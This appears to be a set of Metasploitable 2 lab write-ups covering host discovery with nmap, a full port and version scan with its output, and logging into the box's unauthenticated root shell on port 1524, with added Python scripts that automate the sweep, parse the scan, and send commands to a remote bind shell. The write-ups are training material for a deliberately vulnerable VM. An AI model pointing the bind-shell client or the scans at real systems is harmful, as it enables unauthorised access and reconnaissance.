Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably the simplest of the Metasploitable vulns: a root shell is listening on the box with nothing in front of it, no login, no authentication. Let's see if we can connect to it with telnet.

telnet 192.168.168.134 1524

  • telnet <dest_IP> <dest_Port>. telnet is only acting as a raw TCP client here: nmap reported the service as ‘shell’, not telnet, so nc <dest_IP> <dest_Port> works just as well.

[Screenshot: Metasploitable root login]

Surprisingly, we are dropped straight into the shell without being prompted for credentials.

A quick check with the ‘whoami’ and ‘hostname’ commands confirms we are root on the Metasploitable box.
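
The same interaction scripted, as an added example (my own code, not from the original post). Nothing on 1524 speaks the telnet protocol; it is a shell wired straight to a TCP socket, so a plain Python socket does the job. Each command is sent followed by an echo of a marker so the client knows where that command's output ends, and the marker is written as two quoted halves so that an echoed command line can never be mistaken for the real marker. Because the example has to run without a Metasploitable box to hand, it also carries a small stand-in listener (clearly a fake, answering only whoami, hostname and id the way the real root shell would, and printing a bash-style prompt) that demo() talks to; point bind_shell_exec() at 192.168.168.134 and 1524 to use it for real.

```python
import re
import socket
import sys
import threading

# Interactive bash writes its prompt to the same socket as command output;
# this strips a "user@host:dir# " (or "$ ") prefix from the first line, best effort.
PROMPT_RE = re.compile(r"^[^\n]*[#$] ")


def bind_shell_exec(host, port, commands, timeout=5.0):
    """Connect to an unauthenticated shell bound to a TCP port and run each
    command, returning {command: output}. Every command is followed by an
    echo of a marker so we know where its output ends; the marker is sent
    as two quoted halves ("__do""ne_0__") so the echoed command line, if
    the shell echoes input, never contains the marker itself."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        for i, cmd in enumerate(commands):
            marker = f"__done_{i}__"
            s.sendall(f'{cmd}; echo "__do""ne_{i}__"\n'.encode())
            buf = b""
            while marker.encode() not in buf:
                chunk = s.recv(4096)
                if not chunk:
                    raise ConnectionError("shell closed the connection")
                buf += chunk
            out = buf.decode(errors="replace").split(marker, 1)[0]
            results[cmd] = PROMPT_RE.sub("", out, count=1).strip()
    return results


# --- Constructed stand-in for the Metasploitable listener (not part of the post).
# It answers three commands the way the real root shell would and mimics the
# prompt an interactive bash prints onto the socket, so the example runs offline.
CANNED = {
    "whoami": "root\n",
    "hostname": "metasploitable\n",
    "id": "uid=0(root) gid=0(root) groups=0(root)\n",
}
PROMPT = "root@metasploitable:/# "


def start_stub_bind_shell():
    """Listen on an ephemeral localhost port; return the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(PROMPT.encode())
            buf = b""
            while True:
                chunk = conn.recv(1024)
                if not chunk:
                    break
                buf += chunk
                while b"\n" in buf:
                    line, buf = buf.split(b"\n", 1)
                    cmd, _, rest = line.decode().partition("; echo ")
                    marker = rest.replace('"', "")  # undo the quoting trick
                    reply = CANNED.get(cmd, f"bash: {cmd}: command not found\n")
                    conn.sendall((reply + marker + "\n" + PROMPT).encode())

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo():
    """Offline run of the client against the stub; returns the outputs."""
    port = start_stub_bind_shell()
    return bind_shell_exec("127.0.0.1", port, ["whoami", "hostname", "id"])


if __name__ == "__main__":
    if len(sys.argv) == 3:  # e.g. python3 bindshell.py 192.168.168.134 1524
        print(bind_shell_exec(sys.argv[1], int(sys.argv[2]), ["whoami", "hostname", "id"]))
    else:
        print(demo())
```

The marker approach is what makes this usable for more than a one-off: with a bare interactive shell there is no framing, so reading "until the socket goes quiet" is the only alternative and it is both slow and unreliable.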


Metasploitable 2 – System Recon

Now that we know which IP to target, we can start some recon to gather more details about the system.

Again, there are various ways to do this, but I like to start with nmap.

nmap -sTV -o metasploitable -p1-65535 192.168.168.134
  • -sTV = T is a TCP connect scan (it completes the full handshake, so it works without root but is noisier than the default SYN scan), V is version detection
  • -o metasploitable = write the normal-format output to a file called metasploitable. -o is an older spelling of -oN; -oA metasploitable would also save XML and grepable copies, which are much easier to parse later
  • -p1-65535 = scan every TCP port. Without this nmap only scans its top 1000 most common ports, which would miss the more obscure services on this box
  • 192.168.168.134 = the IP of the Metasploitable box

[Screenshot: nmap port/service results]

So we now have a full list of open ports on the Metasploitable box along with the likely service and even the version in use for each service/application.

Here is the full output:


# Nmap 7.40 scan initiated Sun May 14 15:24:23 2017 as: nmap -sTV -o metasploitable -p1-65535 192.168.168.134
Nmap scan report for 192.168.168.134
Host is up (0.00038s latency).
Not shown: 65505 closed ports

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd (Admin email admin@Metasploitable.LAN)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34140/tcp open  mountd      1-3 (RPC #100005)
37940/tcp open  status      1 (RPC #100024)
42380/tcp open  unknown
57109/tcp open  nlockmgr    1-4 (RPC #100021)

MAC Address: 00:0C:29:D5:07:11 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 14 15:27:08 2017 -- 1 IP address (1 host up) scanned in 165.54 seconds
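
Reading 30 lines by eye is fine once, but you will rerun this scan. Here is an added Python helper (mine, not from the post) that parses the normal-format output into a list of dicts and pulls out the ports where nmap could not pin down a version: a trailing ‘?’ on the service name means nmap only guessed it from the port number, ‘unknown’ means no probe matched, and an empty VERSION column means there was no banner to match. Those are the ports to probe by hand with nc, or to rerun with a more aggressive version scan, which the helper builds the command for. The embedded sample is an excerpt of the scan output above; in practice save with -oX or -oA and parse the XML instead, the text table is only parsed here because it is what the post shows.

```python
import re

# Excerpt of the scan output from the post (the normal-format file), used as sample input.
SAMPLE_SCAN = """\
# Nmap 7.40 scan initiated Sun May 14 15:24:23 2017 as: nmap -sTV -o metasploitable -p1-65535 192.168.168.134
Nmap scan report for 192.168.168.134
Host is up (0.00038s latency).
Not shown: 65505 closed ports

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1524/tcp  open  shell       Metasploitable root shell
6000/tcp  open  X11         (access denied)
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42380/tcp open  unknown

MAC Address: 00:0C:29:D5:07:11 (VMware)
"""

# One table row: port/proto, state, service, optional version text to end of line.
# Only spaces/tabs are allowed between columns so a row can never swallow the next line.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)[ \t]+(\S+)[ \t]+(\S+)(?:[ \t]+(.*))?$", re.M)


def parse_nmap_normal(text):
    """Turn the PORT/STATE/SERVICE/VERSION table into a list of dicts.
    Header, host and MAC lines do not match the pattern and are skipped."""
    entries = []
    for m in PORT_LINE.finditer(text):
        port, proto, state, service, version = m.groups()
        entries.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service, "version": (version or "").strip(),
        })
    return entries


def needs_manual_probe(entries):
    """Ports where nmap did not identify a version and a human should look."""
    return [e for e in entries
            if e["service"].endswith("?") or e["service"] == "unknown" or not e["version"]]


def follow_up_argv(target, entries):
    """nmap command for a second, most-aggressive version scan of just those ports."""
    ports = ",".join(str(e["port"]) for e in needs_manual_probe(entries))
    return ["nmap", "-sV", "--version-intensity", "9", f"-p{ports}", target]


def by_service(entries, name):
    """All rows reported with a given service name, e.g. both 'shell' ports."""
    return [e for e in entries if e["service"] == name]


if __name__ == "__main__":
    parsed = parse_nmap_normal(SAMPLE_SCAN)
    for e in needs_manual_probe(parsed):
        print(f"{e['port']}/{e['proto']} {e['service']}: no version, probe by hand")
    print(" ".join(follow_up_argv("192.168.168.134", parsed)))
```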

We can now use this information to start exploiting the box.

Metasploitable 2 – Finding Metasploitable with nmap

Once both systems are up and running you need to find the victim: what IP does it have, so you can start your exploits against it?

The easiest method would be to log in to Metasploitable with the given creds (msfadmin/msfadmin) and run ‘ifconfig’, but in the interests of this experiment, how would we find the victim if we didn't actually have access to the system in question?

The answer….. Nmap.

Well actually there are numerous methods you could use but Nmap is my choice.

Note: From here on, we are not going to touch the Metasploitable box directly; we are going to use the Kali box throughout. As you use the environment over a period of days or weeks you will likely have to run through the steps below again and again, as the IPs will not necessarily stay the same.

High level steps:

  1. Find out the IP of your Kali box
  2. Use this info to determine the range to scan with Nmap.
  3. Scan with Nmap – find your target

Find your Kali IP

Open a terminal and run ‘ifconfig’:

[Screenshot: ifconfig output]

So in the above screenshot I know my IP is 192.168.168.135. This means (if both systems are in host-only mode on the usual /24 network; check the netmask in the ifconfig output if you are unsure) that the IP of the Metasploitable system will be in the range 192.168.168.1-254.

So let's run Nmap to find out which IP it has:

nmap -sP 192.168.168.1-254

-sP = ping scan, i.e. host discovery only, no port scan. Newer nmap spells this -sn; -sP is still accepted as an alias.

The results show the live IP addresses found by nmap. We know the .135 address is the Kali box and .1 is the default gateway, so it is fair to assume that 192.168.168.134 is the Metasploitable box. If you run the sweep as root, nmap also prints each host's MAC address and vendor (the service scan output elsewhere on this page shows a VMware address for .134), which is a handy confirmation that you are looking at the VM and not something else on the network.

[Screenshot: nmap host discovery results]
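
The three steps above, scripted as an added Python example (my own, not from the post): derive the range from your own address, run the ping sweep with grepable output so it can be parsed one host per line, and drop your own address and the gateway from the live hosts. It uses CIDR notation (192.168.168.0/24) rather than the 1-254 form, which nmap treats the same. The grepable sample embedded in the block is constructed to match the three hosts found above; the runner argument exists so the function can be exercised on that sample without nmap installed, and is left out for a real sweep.

```python
import ipaddress
import re
import subprocess


def scan_range(own_ip, prefixlen=24):
    """Network to sweep, derived from our own address and prefix length.
    Host-only VM networks are /24 unless you changed them; pass the real
    prefix length if ifconfig shows a different mask."""
    return str(ipaddress.ip_interface(f"{own_ip}/{prefixlen}").network)


def discovery_argv(cidr):
    """nmap host discovery only (no port scan). -sn is the current spelling
    of -sP; '-oG -' writes grepable output to stdout, one host per line."""
    return ["nmap", "-sn", "-oG", "-", cidr]


# Grepable line for a live host, e.g. "Host: 192.168.168.134 ()\tStatus: Up"
HOST_UP = re.compile(
    r"^Host:[ \t]+(\d+\.\d+\.\d+\.\d+)[ \t]+\(.*?\)[ \t]+Status:[ \t]+Up[ \t]*$", re.M)


def parse_up_hosts(grepable):
    return [m.group(1) for m in HOST_UP.finditer(grepable)]


def candidate_targets(up_hosts, own_ip, gateway):
    """Everything that answered except ourselves and the gateway."""
    return [h for h in up_hosts if h not in {own_ip, gateway}]


def discover(own_ip, gateway, prefixlen=24, runner=None):
    """Whole procedure: derive range, run (or simulate) nmap, filter hosts.
    'runner' lets a test feed in canned output instead of executing nmap."""
    argv = discovery_argv(scan_range(own_ip, prefixlen))
    if runner is None:
        output = subprocess.run(argv, capture_output=True, text=True, check=True).stdout
    else:
        output = runner(argv)
    return candidate_targets(parse_up_hosts(output), own_ip, gateway)


# Constructed grepable output modelled on the three hosts the sweep in the post found.
SAMPLE_GREPABLE = """\
# Nmap 7.40 scan initiated Sun May 14 15:10:02 2017 as: nmap -sn -oG - 192.168.168.0/24
Host: 192.168.168.1 ()\tStatus: Up
Host: 192.168.168.134 ()\tStatus: Up
Host: 192.168.168.135 ()\tStatus: Up
# Nmap done at Sun May 14 15:10:05 2017 -- 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""


if __name__ == "__main__":
    # Offline run against the constructed sample; drop runner= to really scan.
    print(discover("192.168.168.135", "192.168.168.1", runner=lambda argv: SAMPLE_GREPABLE))
```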

So now we know which system to target, let's start some recon.